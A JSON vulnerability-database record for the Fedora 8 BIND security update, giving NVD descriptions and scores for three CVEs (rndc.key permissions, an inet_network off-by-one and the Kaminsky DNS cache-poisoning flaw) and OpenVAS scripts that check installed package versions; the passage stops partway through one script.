{"id": "FEDORA:M69LMAOI027921", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 8 Update: bind-9.5.0-28.P1.fc8", "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "published": "2008-07-09T21:48:40", "modified": "2008-07-09T21:48:40", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2007-6283", "CVE-2008-0122", "CVE-2008-1447"], "lastseen": "2020-12-21T08:17:49", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6283", "CVE-2008-1447", "CVE-2008-0122"]}, {"type": "openvas", "idList": ["OPENVAS:870118", "OPENVAS:861104", "OPENVAS:1361412562310855101", "OPENVAS:860119", "OPENVAS:1361412562310122582", "OPENVAS:860151", "OPENVAS:1361412562310870118", "OPENVAS:860907", "OPENVAS:855451", "OPENVAS:1361412562310855451"]}, {"type": "nessus", "idList": ["SOLARIS8_109152.NASL", "SOLARIS8_X86_109327.NASL", "FEDORA_2008-0904.NASL", "SOLARIS8_109326.NASL", "REDHAT-RHSA-2008-0300.NASL", "FEDORA_2008-0903.NASL", "SL_20080521_BIND_ON_SL5_X.NASL", "FEDORA_2007-4658.NASL", "FEDORA_2007-4655.NASL", "FEDORA_2008-6281.NASL"]}, {"type": "f5", "idList": ["SOL8578", "SOL8938"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0300"]}, {"type": "redhat", "idList": ["RHSA-2008:0300"]}, {"type": "fedora", "idList": ["FEDORA:M0MG2IGT000424", "FEDORA:LBKJNVQ8025472", "FEDORA:EB89E20852E", "FEDORA:M69LJTSU027591", "FEDORA:M0MG2IGR000424"]}, {"type": "cert", "idList": ["VU:203611"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8571", "SECURITYVULNS:DOC:18862"]}, {"type": "seebug", "idList": ["SSV:9168", "SSV:17308", "SSV:9178", "SSV:2853"]}, {"type": "nmap", "idList": ["NMAP:DNS-RANDOM-TXID.NSE"]}, {"type": "slackware", "idList": ["SSA-2008-191-02"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:68471"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1605-1:9D185", "DEBIAN:DSA-1623-1:F6633"]}, {"type": "suse", "idList": ["SUSE-SA:2008:033"]}, {"type": "ubuntu", "idList": ["USN-627-1"]}, {"type": "centos", "idList": ["CESA-2008:0533-03"]}], "modified": "2020-12-21T08:17:49", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-12-21T08:17:49", "rev": 2}, "vulnersScore": 7.3}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "8", "arch": "any", "packageName": "bind", "packageVersion": "9.5.0", "packageFilename": "UNKNOWN", "operator": "lt"}]}

{"cve": [{"lastseen": "2020-10-03T11:45:55", "description": "Red Hat Enterprise Linux 5 and Fedora install the Bind /etc/rndc.key file with world-readable permissions, which allows local users to perform unauthorized named commands, such as causing a denial of service by stopping named.", "edition": 3, "cvss3": {}, "published": "2007-12-18T01:46:00", "title": "CVE-2007-6283", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-6283"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5.0", "cpe:/o:redhat:fedora_core:*"], "id": "CVE-2007-6283", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6283", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:fedora_core:*:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:20", "description": "Off-by-one error in the inet_network function in libbind in ISC BIND 9.4.2 and earlier, as used in libc in FreeBSD 6.2 through 7.0-PRERELEASE, allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted input that triggers memory corruption.", "edition": 6, "cvss3": {}, "published": "2008-01-16T02:00:00", "title": "CVE-2008-0122", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0122"], "modified": "2019-08-01T12:12:00", "cpe": ["cpe:/a:isc:bind:9.4.2"], "id": "CVE-2008-0122", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0122", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:isc:bind:9.4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:50:58", "description": "The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka \"DNS Insufficient Socket Entropy Vulnerability\" or \"the Kaminsky bug.\"", "edition": 6, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2008-07-08T23:41:00", "title": "CVE-2008-1447", "type": "cve", "cwe": ["CWE-331"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1447"], "modified": "2020-03-24T18:19:00", "cpe": ["cpe:/a:isc:bind:4", "cpe:/a:isc:bind:9.2.9", "cpe:/a:isc:bind:8"], "id": "CVE-2008-1447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1447", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:isc:bind:4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.2.9:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-25T10:56:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2008-1447", "CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860151", "href": "http://plugins.openvas.org/nasl.php?oid=860151", "type": "openvas", "title": "Fedora Update for bind FEDORA-2008-6281", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2008-6281\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"bind on Fedora 8\";\ntag_insight = \"BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols. BIND includes a DNS server (named),\n which resolves host names to IP addresses; a resolver library\n (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating properly.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-July/msg00458.html\");\n script_id(860151);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:01:32 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-6281\");\n script_cve_id(\"CVE-2008-1447\", \"CVE-2008-0122\", \"CVE-2007-6283\");\n script_name( \"Fedora Update for bind FEDORA-2008-6281\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~28.P1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870118", "href": "http://plugins.openvas.org/nasl.php?oid=870118", "type": "openvas", "title": "RedHat Update for bind RHSA-2008:0300-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind RHSA-2008:0300-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\n Name System (DNS) protocols. BIND includes a DNS server (named); a resolver\n library (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating correctly.\n\n It was discovered that the bind packages created the &quot;rndc.key&quot; file with\n insecure file permissions. This allowed any local user to read the content\n of this file. A local user could use this flaw to control some aspects of\n the named daemon by using the rndc utility, for example, stopping the named\n daemon. This problem did not affect systems with the bind-chroot package\n installed. (CVE-2007-6283)\n \n A buffer overflow flaw was discovered in the &quot;inet_network()&quot; function, as\n implemented by libbind. An attacker could use this flaw to crash an\n application calling this function, with an argument provided from an\n untrusted source. (CVE-2008-0122)\n \n As well, these updated packages fix the following bugs:\n \n * when using an LDAP backend, missing function declarations caused\n segmentation faults, due to stripped pointers on machines where pointers\n are longer than integers.\n \n * starting named may have resulted in named crashing, due to a race\n condition during D-BUS connection initialization. This has been resolved in\n these updated packages.\n \n * the named init script returned incorrect error codes, causing the\n &quot;status&quot; command to return an incorrect status. In these updated packages,\n the named init script is Linux Standard Base (LSB) compliant.\n \n * in these updated packages, the &quot;rndc [command] [zone]&quot; command, where\n [command] is an rndc command, and [zone] is the specified zone, will find\n the [zone] if the zone is unique to all views.\n \n * the default named log rotation script did not work correctly when using\n the bind-chroot package. In these updated packages, installing\n bind-chroot creates the symbolic link &quot;/var/log/named.log&quot;, which points\n to &quot;/var/named/chroot/var/log/named.log&quot;, which resolves this issue.\n \n * a previous bind update incorrectly changed the permissions on the\n &quot;/etc/openldap/schema/dnszone.schema&quot; file to mode 640, instead of mode\n 644, which resulted in OpenLDAP not being able to start. In these updated\n packages, the permissions are correctly set to mode 644.\n \n * the &quot;checkconfig&quot; parameter was missing in the named usage report. For\n example, running the &quot;service named&quot; command did not return &quot;checkconfi ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"bind on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-May/msg00020.html\");\n script_id(870118);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0300-02\");\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_name( \"RedHat Update for bind RHSA-2008:0300-02\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "id": "OPENVAS:860119", "href": "http://plugins.openvas.org/nasl.php?oid=860119", "type": "openvas", "title": "Fedora Update for bind FEDORA-2008-0903", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2008-0903\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"bind on Fedora 8\";\ntag_insight = \"BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols. BIND includes a DNS server (named),\n which resolves host names to IP addresses; a resolver library\n (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating properly.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-January/msg00781.html\");\n script_id(860119);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:12:43 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-0903\");\n script_cve_id(\"CVE-2008-0122\", \"CVE-2007-6283\");\n script_name( \"Fedora Update for bind FEDORA-2008-0903\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.5.0~23.b1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "Check for the Version of bind", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870118", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870118", "type": "openvas", "title": "RedHat Update for bind RHSA-2008:0300-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind RHSA-2008:0300-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\n Name System (DNS) protocols. BIND includes a DNS server (named); a resolver\n library (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating correctly.\n\n It was discovered that the bind packages created the &quot;rndc.key&quot; file with\n insecure file permissions. This allowed any local user to read the content\n of this file. A local user could use this flaw to control some aspects of\n the named daemon by using the rndc utility, for example, stopping the named\n daemon. This problem did not affect systems with the bind-chroot package\n installed. (CVE-2007-6283)\n \n A buffer overflow flaw was discovered in the &quot;inet_network()&quot; function, as\n implemented by libbind. An attacker could use this flaw to crash an\n application calling this function, with an argument provided from an\n untrusted source. (CVE-2008-0122)\n \n As well, these updated packages fix the following bugs:\n \n * when using an LDAP backend, missing function declarations caused\n segmentation faults, due to stripped pointers on machines where pointers\n are longer than integers.\n \n * starting named may have resulted in named crashing, due to a race\n condition during D-BUS connection initialization. This has been resolved in\n these updated packages.\n \n * the named init script returned incorrect error codes, causing the\n &quot;status&quot; command to return an incorrect status. In these updated packages,\n the named init script is Linux Standard Base (LSB) compliant.\n \n * in these updated packages, the &quot;rndc [command] [zone]&quot; command, where\n [command] is an rndc command, and [zone] is the specified zone, will find\n the [zone] if the zone is unique to all views.\n \n * the default named log rotation script did not work correctly when using\n the bind-chroot package. In these updated packages, installing\n bind-chroot creates the symbolic link &quot;/var/log/named.log&quot;, which points\n to &quot;/var/named/chroot/var/log/named.log&quot;, which resolves this issue.\n \n * a previous bind update incorrectly changed the permissions on the\n &quot;/etc/openldap/schema/dnszone.schema&quot; file to mode 640, instead of mode\n 644, which resulted in OpenLDAP not being able to start. In these updated\n packages, the permissions are correctly set to mode 644.\n \n * the &quot;checkconfig&quot; parameter was missing in the named usage report. For\n example, running the &quot;service named&quot; command did not return &quot;checkconfi ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"bind on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-May/msg00020.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870118\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0300-02\");\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n script_name( \"RedHat Update for bind RHSA-2008:0300-02\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.P1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n 